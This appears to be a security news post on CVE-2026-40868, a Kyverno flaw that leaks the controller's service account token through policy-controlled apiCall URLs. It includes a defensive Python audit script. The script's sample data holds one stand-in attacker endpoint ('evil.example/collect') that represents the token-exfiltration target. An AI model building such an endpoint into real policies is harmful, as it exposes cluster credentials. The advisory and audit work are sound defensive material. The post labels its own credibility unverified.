## Critical Confused Deputy Flaw in Kyverno Exposes Service Account Tokens to Attacker-Controlled Endpoints
A high-severity vulnerability in Kyverno, tracked as CVE-2026-40868, lets a policy redirect the Kyverno controller's Kubernetes service account token to attacker-controlled endpoints, a classic confused deputy attack. The flaw exists in the apiCall servicecall helper, which implicitly injects an `Authorization: Bearer` token whenever a ClusterPolicy or global context does not explicitly define an Authorization header. Because context.apiCall.service.url is policy-controlled, an actor with ClusterPolicy creation rights could craft a policy that sends the Kyverno controller service account token to an external server under their control.

The vulnerability stems from a trust assumption baked into Kyverno's architecture: the apiCall mechanism treats the service URL as a trusted target for internal service account credentials. Namespaced policies are protected by the namespaced urlPath gate in pkg/engine/apicall/apiCall.go, limiting the attack surface to ClusterPolicy and global context usage. This scoping means the flaw does not affect standard namespace-scoped policies, but leaves cluster-wide configurations exposed. All branches prior to the fix—release-1.16, release-1.17, and main—carry the vulnerability.

Kyverno has patched the issue in version 1.16.4. Organizations running affected versions should prioritize upgrading and audit existing ClusterPolicies for any apiCall definitions pointing to external or untrusted URLs. The exposure is particularly concerning in multi-tenant Kubernetes environments where untrusted users may have ClusterPolicy write access. The underlying risk underscores a broader class of vulnerabilities in policy engines: when policy definitions can influence credential usage, the boundary between policy enforcement and credential handling must be strictly controlled.
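An audit helper along the lines of that recommendation, added here as example code (not Kyverno's own tooling): it walks ClusterPolicy and GlobalContextEntry objects as returned by `kubectl get ... -o json` and flags every apiCall.service.url that is not an in-cluster name and carries no explicit Authorization header, since that is precisely the case in which the controller token is implicitly injected. The `service.headers` list-of-name/value shape, the in-cluster DNS suffixes and the sample objects are assumptions.

```python
"""Flag Kyverno apiCall.service targets that would get the controller's auto-injected token."""
from urllib.parse import urlparse

INTERNAL_SUFFIXES = (".svc", ".svc.cluster.local")  # assumption: in-cluster DNS names

def is_internal_host(url):
    host = (urlparse(url).hostname or "").lower()
    return bool(host) and (host.endswith(INTERNAL_SUFFIXES) or "." not in host)

def has_explicit_authorization(service):
    # Assumed schema: service.headers is a list of {"name": ..., "value": ...}.
    return any(str(h.get("name", "")).lower() == "authorization"
               for h in service.get("headers") or [])

def iter_service_calls(obj):
    """Yield (location, service) from ClusterPolicy rule contexts or a GlobalContextEntry."""
    kind, spec = obj.get("kind"), obj.get("spec") or {}
    name = (obj.get("metadata") or {}).get("name", "?")
    if kind == "ClusterPolicy":
        for rule in spec.get("rules") or []:
            for ctx in rule.get("context") or []:
                svc = (ctx.get("apiCall") or {}).get("service")
                if svc:
                    yield f"{kind}/{name} rule={rule.get('name')} ctx={ctx.get('name')}", svc
    elif kind == "GlobalContextEntry":
        svc = (spec.get("apiCall") or {}).get("service")
        if svc:
            yield f"{kind}/{name}", svc

def audit(objects):
    """Return [(location, url)] for external calls with no explicit Authorization header."""
    return [(where, svc.get("url", "")) for obj in objects
            for where, svc in iter_service_calls(obj)
            if not is_internal_host(svc.get("url", ""))
            and not has_explicit_authorization(svc)]

# Constructed sample (not from a real cluster): one in-cluster call, one external
# call that sets its own Authorization header, one external call that does not.
SAMPLE = [
    {"kind": "ClusterPolicy", "metadata": {"name": "enrich"}, "spec": {"rules": [
        {"name": "lookup", "context": [
            {"name": "ok", "apiCall": {"service": {"url": "https://svc.ns.svc:8443/x"}}},
            {"name": "bad", "apiCall": {"service": {"url": "https://evil.example/collect"}}},
        ]}]}},
    {"kind": "GlobalContextEntry", "metadata": {"name": "ext"}, "spec": {"apiCall": {
        "service": {"url": "https://api.example.com/v1",
                    "headers": [{"name": "Authorization", "value": "Bearer <own>"}]}}}},
]
```

Feed it the `items` of `kubectl get clusterpolicies,globalcontextentries -o json`; only the `bad` context in the sample is reported, because the other two either stay in-cluster or bring their own credential.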
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: CVE-2026-40868, Kyverno, confused-deputy, Kubernetes, cloud-native
- **Credibility**: unverified
- **Published**: 2026-04-24 03:54:07
- **ID**: 76659
- **URL**: https://whisperx.ai/en/intel/76659